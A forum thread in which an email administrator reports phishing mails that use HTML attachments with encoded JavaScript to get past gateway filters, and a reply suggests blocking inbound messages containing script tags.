cancel
Showing results for 
Search instead for 
Did you mean: 
Highlighted
Reliable Contributor marcus69
Reliable Contributor
Report Inappropriate Content
Message 1 of 2

Problem with embedded and encoded Javascripts

Hi all

This week we've discovered some Mails with a nasty method how to sneak throught Email Gateway filters:

Mails come in pretending to have an embedded excel Spreadsheet hiding behind an excel icon graphic.

Behind that there is attached html-file that contains an embedded and encoded Javascript.

xls-fake.jpg

Here's an excerpt of the source code within the html file:

sourcecode.jpg

The Emailgateway does not detect any Javascript by filetype here, as it is a html/txt Document, and shows no offending code on the first glimpse.

Unescaping the Codesequence reveals a Phishing Site on this case.

In my opinion this is the prestep of the next Malware wave as this bypasses AV-Engine and Javascript Filetype detection.

If these mails manage to get pass the Antispam and Reputationfilters, and You have no Webgateway or Advanced Threat Defense, You're may be doomed.

Best Regards,

   Marcus

PS: Did some enhanced Testing on this. One solution can be to filter HTML attachments by Filetype. HTML Email Content is not affected on this, only attachments.

1 Reply
runcmd
Level 10
Report Inappropriate Content
Message 2 of 2

Re: Problem with embedded and encoded Javascripts

I might be a day late and a dollar short on this one, but...  If you create a custom compliance dictionary that applies to everything and contains the strings "<script" and/or "</script>", and then add that dictionary to the "Spam Terms" component of the anti-spam settings for your inbound mail rule, wouldn't that help stop these?  That should block anything inbound that appears to contain a script.  (Unless you actually do need to receive some messages containing scripts.)

More McAfee Tools to Help You
  • How-to: Endpoint Removal Tool
  • Support: Endpoint Security
  • Visit: Business Service Portal
  • More: Search Knowledge Articles
  • ePolicy Orchestrator Support
  • The McAfee ePO Support Center Plug-in is now available in the Software Manager. Follow the instructions in the Product Guide for more.